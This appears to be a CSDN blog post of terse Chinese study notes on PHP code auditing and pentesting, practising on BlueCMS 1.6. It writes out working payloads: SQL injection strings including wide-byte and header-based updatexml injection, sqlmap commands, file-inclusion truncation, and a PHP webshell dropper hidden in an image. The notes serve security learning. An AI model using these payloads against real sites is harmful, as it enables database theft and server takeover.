代码审计思路总结

本文详细探讨了代码审计在渗透测试中的重要性,涉及白盒和黑盒审计方法,以及如何通过定位敏感函数、检查参数传递和利用特定漏洞(如SQL注入、XSS)来发现和防止安全问题。作者还分享了针对PHP的实例和常见漏洞利用技术,强调了不同环境安全性的相对弱点。
摘要由CSDN通过智能技术生成

代码审计思路:

:::::::::::::::::::::::::::::::::::::::::
渗透测试人员-----渗透测试---找漏洞---找Bug -衔接问题 技术


安全不孤立  漏洞一定存在
业务方便 -安全;;;
代码审计核心 知道代码如何执行;执行中可能产生的问题;;白盒审计;
通用型漏洞 CMS通杀漏洞不是仅仅代码审计能找到;
思路::1全文通读;;
    2敏感函数定位;;存在危险函数的地方 反推;;
    黑盒+白盒 代码审计放式 传参进去;构建合适语句进行尝试;
    
    黑盒  1信息收集;
          2寻找功能点传参;::::::::::::::::::::::::::::::
          
正常测试方法:1SQL注入 2XSS 3CSRF 4XXE 5SSRF 6文件上传
            逻辑漏洞 : 1验证码绕过2密码找回3支付逻辑4越权
    不成功1过滤(规则)2传参错误        

白盒 :: 1变量覆盖 2文件包含3反序列化
实践:::::::::::::::::::
思路 
安装重复安装双引号解析直接写shell$()  
前台 用户注册 SQL注入 存储性XSS 逻辑错误宽字节  
     用户登录: 宽字节注入%df万能密码 cookie未加密
     修改资料 :存储XSS ;sql注入;文件上传
     评论  head注入 支付 本地文件包含
后台 万能密码 备份文件可猜测 
1看文章复现;2看CNVD,3自己挖掘定位函数通读';;;
 
 1环境搭建bluecms1.6
2安装版块install  多次安装??能破坏网站
3重复安装能进去后台   后台比前台弱 内网比外网弱;;
4重装也会产生安全问题;config.php   
PHP版本5.5上双引号解析 "${};"
双引号解析${assert($_REQUEST[a])}
'")#测试  魔术引号 宽字节注入%df'
插入语句一次能否插入多条语句;
注册 万能密码   汉') or 1=1 #   ------ a') or 1=1 # --------BP url解码:%df%27

5.2.17PHP版本
seeeion 变量覆盖 验证码对不上 php.ini
1117 session
网站存在sql注入 ,当页面存在代表可能很多页面存在.
admin' or 1=1#
url解码
bp改包:  %df%27
备份 年月日 .sql
WWW            /data/backup/

后台比前台弱;内网比外网弱
宽字节核心 魔术引号 在'"\前面加 \
影响 :传参GET\\\POST\\\\Cookie会被处理  试试请求头php heat
requie_once();
die($_GET['id']);  被转义
die($_SERVER["HTTP_USER_AGENT"]);  /comment.php   getip
全局搜索 先看路径 $_server  getip  --XSS  <script>alert(1)</script>
                                            利用事件处发  on                
html实体 函数 htmlspecialchars()   转义 <>
bpIP::X-Forwarded_For: 1' and updatexml(1,concat(0x7e,(select database())),1),1)# 
1' and updatexml(1,concat(0x7e,(select database())),1),1)#
X-Forwarded_For: 1'*,1)#   py -2 sqlmap.py -r 1.txt --level 3  
sqlmap报错 ::1的等级--level 3  ;;2闭合问题1'*,1)#
--dbs

前台 getshell 带走服务器 :::::::::::::::::::::::::
include  $_POST['pay']
 &pay=123
 输出echo  123 index.php  包含漏洞
window 路径长度限制 ;; 截断5.3以下 有................................
256个字符 
pay=../../.jpg .........................................
需要的书代码 木马 :<?php >
eval(file_put_contents('8.php','<?php eval($_REQUEST[a]) ?>')); ?>
cmd  copy .jpg/b + 1.txt .jpg

  • 7
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值